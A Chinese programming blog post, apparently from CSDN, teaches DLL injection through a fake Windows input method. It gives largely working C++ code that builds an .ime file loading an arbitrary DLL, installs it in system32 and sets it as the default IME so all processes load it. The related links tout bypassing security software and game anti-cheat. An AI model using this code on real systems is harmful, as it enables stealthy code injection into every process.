DLL注入技术之输入法注入

最新推荐文章于 2020-01-16 17:05:03 发布
最新推荐文章于 2020-01-16 17:05:03 发布
阅读量6.9k 收藏 5
点赞数 2
分类专栏: 系统API C++
 输入法注入原理是利用Windows系统中在切换输入法需要输入字符时,系统就会把这个输入法需要的ime文件装载到当前进程中,而由于这个Ime文件本质上只是个存放在C:\WINDOWS\system32目录下的特殊的DLL文件,因此我们可以利用这个特性,在Ime文件中使用LoadLibrary()函数待注入的DLL文件。
1.编写Ime文件
    输入法的Ime文件其实就是个显式导出19个特殊函数的DLL文件。如下图所示:

    如果想编写输入法程序,那么这19个导出函数都需要仔细的研究,但是对于只想实现注入的我们,现在只需要对ImeInquire()有比较深的认识就可以了。ImeInquire()是启动并初始化当前Ime输入法函数,他的声明如下:
  1. BOOL WINAPI ImeInquire(LPIMEINFO lpIMEInfo,LPTSTR lpszUIClass,LPCTSTR lpszOption)
复制代码
第一个参数lpIMEInfo比较重要,用于输入对Ime输入法初始化的内容结构,如果这个结构填写错误,就会导致输入法不能正常运行。第二个参数是输入一个class类名,我们需要先使用RegisterClassEx()注册出一个窗口类。初始化ImeInquire()主要代码如下所示:

  2. //启动并初始化当前ime输入法
  3. BOOL WINAPI ImeInquire(LPIMEINFO lpIMEInfo,LPTSTR lpszUIClass,LPCTSTR lpszOption)
  4. {
  5.     //输入法初始化过程
  6.     //系统根据它为INPUTCONTEXT.hPrivate分配空间
  7.     lpIMEInfo->dwPrivateDataSize = 0; 
  8.     lpIMEInfo->fdwProperty = IME_PROP_KBD_CHAR_FIRST |
  9.         IME_PROP_IGNORE_UPKEYS |
  10.         IME_PROP_END_UNLOAD; 

  12.     lpIMEInfo->fdwConversionCaps = IME_CMODE_FULLSHAPE |
  13.         IME_CMODE_NATIVE;

  15.     lpIMEInfo->fdwSentenceCaps = IME_SMODE_NONE;
  16.     lpIMEInfo->fdwUICaps = UI_CAP_2700;

  18.     lpIMEInfo->fdwSCSCaps = 0;

  20.     lpIMEInfo->fdwSelectCaps = SELECT_CAP_CONVERSION;

  22.     // 注意该输入法基本窗口类必须注册,否则输入法不能正常运行
  23.     _tcscpy(lpszUIClass,CLSNAME_UI);
  24.     return TRUE;
  25. }
复制代码
注册出一个窗口类的主要代码如下:
  1. BOOL ImeClass_Register(HINSTANCE hInstance)
  2. {
  3.     WNDCLASSEX wc;
  4.     wc.cbSize         = sizeof(WNDCLASSEX);
  5.     wc.style          = CS_VREDRAW | CS_HREDRAW | CS_DBLCLKS | CS_IME;
  6.     wc.lpfnWndProc    = UIWndProc;
  7.     wc.cbClsExtra     = 0;
  8.     wc.cbWndExtra     = 2 * sizeof(LONG);
  9.     wc.hInstance      = hInstance;
  10.     wc.hCursor        = LoadCursor( NULL, IDC_ARROW );
  11.     wc.hIcon          = NULL;
  12.     wc.lpszMenuName   = (LPTSTR)NULL;
  13.     wc.lpszClassName  = CLSNAME_UI;
  14.     wc.hbrBackground  = NULL;
  15.     wc.hIconSm        = NULL;

  17.     if( !RegisterClassEx( (LPWNDCLASSEX)&wc ) )
  18.         return FALSE;

  20.     return TRUE;
  21. }
复制代码
CLSNAME_UI是一个宏定义,如下:
  1. #define CLSNAME_UI _T("DLLCLASSNAME")
复制代码
在DllMain进程加载的过程中注册窗口类,主要代码如下:
  1.     case DLL_PROCESS_ATTACH:
  2.         if(!ImeClass_Register(hinstDLL)) return FALSE;

  4.         //这里填写要load的DLL的路径
  5.         g_hModule = LoadLibrary(_T("D:\\MyDll\\ImeInject\\Debug\\MfcImeInjectDll.dll"));
  6.         
  7.         if (!g_hModule)
  8.         {
  9.             MessageBox(NULL,_T("模块没有load成功"),_T("提示"),MB_OK);
  10.         }
  11.         break;
复制代码
此刻默认输出的DLL文件扩展名是.dll,与扩展名是.ime不符,可以通过下图设置将其扩展名改为.ime:

2.编写装载输入法程序:
    装载输入法的基本逻辑就是将他们编写的输入法设置为默认输入法,这样只要系统中所有进程都会默认加载他们的恶意输入法程序。
    黑客们首先需要得到系统当前的默认的输入法,以便恢复时使用。然后需要将ime文件拷贝到C:\WINDOWS\system32目录下,最后将装载成功后将我们的输入法设置成为默认输入法,主要代码如下:
  1. void CMfcImeInjectDlg::OnBnClickedAttach()
  2. {
  3.     // TODO: 在此添加控件通知处理程序代码
  4.     //得到默认的输入法句柄并保存
  5.     ::SystemParametersInfo(
  6.         SPI_GETDEFAULTINPUTLANG,
  7.         0,
  8.         &m_retV,
  9.         0);

  11.     //拷贝到system目录,只有ime文件在system32下才能装载成功
  12.     CopyFile(
  13.         _T("D:\\MyDll\\ImeInject\\Debug\\MyImeDll.ime"),
  14.         _T("C:\\WINDOWS\\system32\\MyImeDll.ime"),
  15.         FALSE);

  17.     //装载输入法
  18.     m_hImeFile = ImmInstallIME(
  19.         _T("MyImeDll.ime"), 
  20.         _T("我的输入法"));

  22.     if( ImmIsIME(m_hImeFile) )
  23.     {
  24.         //设置为默认输入法
  25.         SystemParametersInfo(
  26.             SPI_SETDEFAULTINPUTLANG,
  27.             0,
  28.             &m_hImeFile,
  29.             SPIF_SENDWININICHANGE);
  30.         MessageBox(_T("安装输入法成功"));
  31.     }
  32. }
复制代码
3.编写卸载输入法:
    当新建进程不再需要注入时,我们就需要卸载输入法。卸载输入法时需要先判定系统当前的输入法不是其原有默认输入法,确认无误后将系统的默认输入法恢复后,再将恶意输入法卸载即可,主要代码如下:
  1. void CMfcImeInjectDlg::OnBnClickedDettach()
  2. {
  3.     // TODO: 在此添加控件通知处理程序代码
  4.     ::SystemParametersInfo(
  5.         SPI_SETDEFAULTINPUTLANG,
  6.         0,
  7.         &m_retV,
  8.         SPIF_SENDWININICHANGE);
  9.     if (UnloadKeyboardLayout(m_hImeFile))
  10.     {
  11.         MessageBox(_T("输入法卸载成功"));
  12.     }
  13. }
  14.    
复制代码
输入法注入的实现需要对输入法IME文件的生成有所了解,API使用较多,所以实现起来比较难,但是由于系统存在多个输入法,被注入进程很难判别当前是可信赖输入法还是用于注入的恶意输入法,所以难以阻止,大大提高了注入的几率
TreeExplore
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用输入法注入任意DLL演示
07-02
利用输入法注入任意DLL演示(可绕过大多数安全软件的检测,能够注入带有自我保护的进程)
黑客级黑科技:C++获取键盘输入信息(Dll源码+实例)
06-11 1238
VC++获取键盘输入信息,本程序由两部分构成,一个是所用Dll的源码,另外一个则是实例,实例要调用编译生成的Dll文件,因此测试前应先编译LaunchDLL,然后把LaunchDLL.h和LaunchDLL.lib复制到KeyHook工程目录中,LaunchDLL.dll复制到Debug目录下。 项目展示: 代码展示: C++的cin说方便吧如果只是输入一个变量...
电脑小技巧
weixin_34032792的博客
06-10 1293
.重装WindowsXP不需再激活如果你需要重装WindowsXP,通常必须重新激活。事实上只要在第一次激活时,备份好Windows\System32目录中的Wpa.dbl文件,就不用再进行激 活的工作了。在重装WindowsXP后,只需要复制该文件到上面的目录即可。2.如何知道自己的WindowsXP是否已激活打开开始→运行,在弹出的对话框中输入:oobe/ ...
输入法注入dll
o330820350的专栏
09-04 1151
[cpp] view plaincopy ImmInstallIME("C:/WINDOWS/system32/123.dll","扩展输入法");    typedef int (CALLBACK * IMESetPubStringFunc)(LPCTSTR tmpStr,DWORD UnloadDLL,DWORD loadNextIme,DWORD DllDat
windows使用技巧
xueliang59211的专栏
04-29 1254
1. 重装Windows XP不需再激活   如果你需要重装Windows XP,通常必须重新激活。事实上只要在第一次激活时,备份好Windows\\System32目录中的Wpa.dbl文件,就不用 再进行激活的工作了。在重装Windows XP后,只需要复制该文件到上面的目录即可。 2. 如何知道自己的Windows XP是否已激活   打开开始→运行,在弹出的对...
Windows Ring3层注入——输入法注入(六)
qq_38493448的博客
01-16 1897
Windows Ring3层注入——输入法注入(六)输入法介绍输入法注入原理输入法注入的相关知识输入法注入步骤输入法注入的函数原型及代码示例输入法注入操作描述流程图删除自己安装的输入法: 输入法介绍 输入法是一类特殊的程序,主要功能在程序中是进行文字的输入,一般有外挂式(早期的“万能五笔”)和输入法接口式两种实现方式。 外挂式比较简单,它的形式通常是一个EXE文件,通过模拟一些Windows输入...
基于visual c++之windows核心编程代码分析(61)打造自己的Windows输入法
weixin_30861797的博客
01-24 245
IMM(Input Method Manager)只在安装了亚洲语言包之后才能使用。通过调用GetSystemMetrics(SM_IMMENABLED)知道IMM是否使能。一共由三部分组成:status window 输入法状态栏 表示正在处于中文输入状态可以知道是什么输入法composition window 当你开始输入字母的时候,显示字母candidates window 紧靠...
DLL注入的8种姿势
热门推荐
VI___
08-24 1万+
目录 1、远程线程注入 2、APC注入 3、注册表注入 4、ComRes注入 5、劫持进程创建注入 6、输入法注入 7、消息钩子注入 8、依赖可信任进程注入 一、DLL注入——远程线程注入 https://blog.csdn.net/Cody_Ren/article/details/100041660 二、DLL注入——APC注入 APC注入...
给网游写一个挂
07-19 2656
去年做了一些研究,研究做外挂的一些相关技术,打算放出来跟大家分享,分享一下我们做挂的一些思路,挂的原理,希望抛砖引玉。   外挂说白了就是用程序代替人去操纵游戏,模拟人向游戏程序发送键盘、鼠标消息。一般的流程就是: 1、 通过Windows系统的OpenProcess API打开目标进程 – 也就是游戏,以便能读写目标内存的数据,甚至是调用目标进程的函数,比如某些世界级的游戏里的
VC 输入法注入源码
weixin_33859504的博客
07-29 480
原文地址:http://blog.csdn.net/chanchaw/article/details/7599746 01.ImmInstallIME("C:/WINDOWS/system32/123.dll","扩展输入法"); 02. typedef int (CALLBACK * IMESetPubStringFunc)(LPCTSTR tmpStr,DWORD Unload...
输入法注入
11-19
输入法注入原理及其工具代码
VC输入法注入源码
11-08
VC输入法注入源码
输入法注入DLL
02-02
很强很好用。可以过TX的很多检测 不可用于非法
输入法注入源码+例程
05-28
输入法注入源码+例程 非常实用 非常实用 非常实用 非常实用
输入法注入源代码VC
08-05
VC的输入法注入源代码,可用于有注入保护的游戏
输入法DLL注入
11-05
输入法DLL注入器喜欢下载感谢这个平台
输入法注入dll.ec
07-16
易语言:输入法形式注入dll到游戏进程内,有效过掉检测,简单一句代码调用。
利用输入法注入DLL
05-19
全软件屏蔽的DLL注入方法,后来发现,输入法程序就是能完成这一任务的理想人选。输入 法程序程序到底是什么?它没有自己的进程,并且在系统还没有登录时就已被加载(在欢迎 界面你也可以调出输入法),它可以在...
DLL注入.ec
07-05
APC注入_内存 APC注入_应用层 ...输入法注入 消息钩子注入 远程线程注入DLL 远程注入_调用函数 注册表注入 卸载内存注入 卸载输入法注入 卸载消息钩子 卸载注册表注入 卸载远程线程DLL 卸载注册表注入
delphi dlldll注入
最新发布
08-07
Delphi是一种编程语言,而DLL(Dynamic-Link Library)是一种模块化的文件格式,用于存储代码和数据,可以被多个应用程序共享。DLL注入是一种技术,它允许将DLL文件加载到正在运行的进程中,并使得该进程能够调用DLL中的函数和使用其中的数据。 在Delphi中实现DLL注入的方法有很多种。一种常见的方法是使用Windows API函数LoadLibrary和GetProcAddress。通过调用LoadLibrary函数,将DLL文件加载到进程的虚拟地址空间中。然后使用GetProcAddress函数获取DLL中导出函数的地址,并将其传递给需要调用的函数。通过这种方式,可以在运行时将DLL注入到目标进程中,并且通过调用DLL中的函数来扩展进程的功能。 DLL注入在实际应用中有多种用途。例如,可以使用DLL注入来为某个程序添加额外的功能或修改程序的行为。DLL注入还可以用于实现一些调试和监控的功能。通过注入DLL,可以截获程序的输入和输出,或者在程序执行某些指定的操作时进行额外的处理。 在Delphi中实现DLL注入需要一定的编程知识和技巧。需要考虑目标进程的架构和权限限制,以及如何管理注入DLL的生命周期和资源管理。同时,还需要处理一些安全性和稳定性方面的问题,以确保注入过程不会对目标进程造成损害或崩溃。 总之,Delphi可以通过调用Windows API函数来实现DLL注入,从而扩展和修改进程的功能。但在实际应用中,需要考虑各种方面的问题,并且遵守相关的法律和规定,以确保注入操作的安全性和合法性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值